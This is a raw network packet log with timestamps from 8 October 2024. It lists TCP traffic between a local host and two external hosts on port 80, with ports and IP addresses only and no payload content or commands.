Oct 8, 2024 11:30:37.509357929 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509361982 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509362936 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509375095 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509380102 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509387016 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509423018 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509427071 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509433985 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509443045 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509455919 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509465933 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509475946 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509486914 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509486914 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509490013 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509501934 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509514093 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509517908 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509520054 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509531021 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509533882 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509541988 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509552002 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509562969 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509598017 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509598017 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509712934 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509722948 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509766102 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.509784937 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509795904 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509805918 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.509815931 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510082006 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510129929 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510129929 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510129929 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510210037 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510221004 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510231018 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510236025 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510241032 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510278940 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510288000 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510305882 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510308981 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510308981 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510317087 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510328054 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510370970 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510371923 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510425091 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510437965 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510448933 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510459900 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510472059 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510477066 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510498047 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510498047 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510515928 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510585070 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510596037 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510606050 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510611057 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510621071 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510632992 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510642052 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510652065 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510663033 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510673046 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510682106 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510691881 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510698080 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510698080 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510698080 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510701895 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510713100 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510730028 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510750055 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510751963 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510751963 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510751963 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510762930 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510772943 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510782957 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510792971 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510803938 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510813951 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510824919 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510833979 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510838032 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510838032 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510838032 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510845900 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510857105 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510859013 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510868073 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510879040 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510889053 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510893106 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510900021 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510911942 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.510911942 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.510927916 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.511410952 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.559779882 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:41.023092031 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:44.412209988 CEST	49882	80	192.168.2.6	192.243.59.20
Oct 8, 2024 11:30:44.417172909 CEST	80	49882	192.243.59.20	192.168.2.6
Oct 8, 2024 11:30:44.417269945 CEST	49882	80	192.168.2.6	192.243.59.20
Oct 8, 2024 11:30:44.417327881 CEST	49882	80	192.168.2.6	192.243.59.20
Oct 8, 2024 11:30:44.422214985 CEST	80	49882	192.243.59.20	192.168.2.6
Oct 8, 2024 11:30:44.881741047 CEST	80	49882	192.243.59.20	192.168.2.6
Oct 8, 2024 11:30:44.881925106 CEST	80	49882	192.243.59.20	192.168.2.6
Oct 8, 2024 11:30:44.882062912 CEST	49882	80	192.168.2.6	192.243.59.20
Oct 8, 2024 11:30:44.882160902 CEST	49882	80	192.168.2.6	192.243.59.20
Oct 8, 2024 11:30:44.886976004 CEST	80	49882	192.243.59.20	192.168.2.6
Oct 8, 2024 11:30:48.016222954 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.021863937 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.021934032 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.022135973 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.027105093 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.611979961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.611993074 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612010956 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612040997 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612057924 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612066984 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.612080097 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612096071 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612114906 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612118006 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.612128973 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612129927 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.612153053 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.612163067 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.612188101 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.617151976 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.617162943 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.617176056 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.617218018 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.657180071 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.699614048 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.699687004 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.699697971 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.699717999 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.699728966 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.699728012 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.699812889 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.700129986 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700144053 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700161934 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700171947 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700191975 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.700244904 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.700733900 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700778961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700789928 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700819016 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.700851917 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.700855970 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700870037 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.700922966 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.701925039 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.701975107 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.701986074 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702016115 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.702095985 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702107906 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702145100 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.702531099 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702594995 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702605009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702610970 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.702627897 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.702655077 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.704629898 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.704641104 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.704689026 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788192034 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788239956 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788249016 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788284063 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788310051 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788320065 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788338900 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788350105 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788383007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788383007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788412094 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788422108 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788439035 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788449049 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788465977 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788480043 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788480043 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788580894 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788630962 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788641930 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788666964 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788666964 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788691044 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788701057 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788721085 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788733006 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788737059 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788759947 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788770914 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788788080 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788796902 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788803101 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788803101 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788815022 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.788856983 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.788856983 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789577007 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789591074 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789609909 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789632082 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789639950 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789658070 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789668083 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789673090 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789673090 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789777040 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789794922 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789804935 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789822102 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789833069 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789850950 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.789860964 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789860964 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.789925098 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.790544987 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790555000 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790572882 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790608883 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.790620089 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790631056 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790647984 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.790695906 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.790695906 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.875674009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875722885 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875824928 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875869036 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875879049 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875912905 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.875912905 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.875943899 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875953913 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875973940 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.875983953 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876003027 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876023054 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876033068 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876051903 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876063108 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876068115 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876069069 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876080036 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876127005 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876127005 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876430988 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876441956 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876465082 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876486063 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876494884 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876513004 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876523018 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876535892 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876535892 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876538038 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876580954 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876580954 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876876116 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876885891 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876907110 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876925945 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.876948118 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876966953 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876976967 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.876993895 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877005100 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877013922 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877013922 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877022982 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877033949 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877084017 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877084017 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877562046 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877579927 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877602100 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877612114 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877629042 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877639055 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877654076 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877654076 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877659082 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877670050 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877691031 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877700090 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877717018 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877717018 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877722025 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877738953 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.877779961 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.877779961 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.878302097 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878326893 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878336906 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878355026 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878365040 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878382921 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878393888 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878396034 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.878396034 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.878411055 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878427029 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878441095 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.878462076 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.878462076 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.878551960 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963110924 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963121891 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963141918 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963201046 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963268042 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963279009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963296890 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963315964 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963326931 CEST	80	49903	63.250.38.167	192.168.2.6
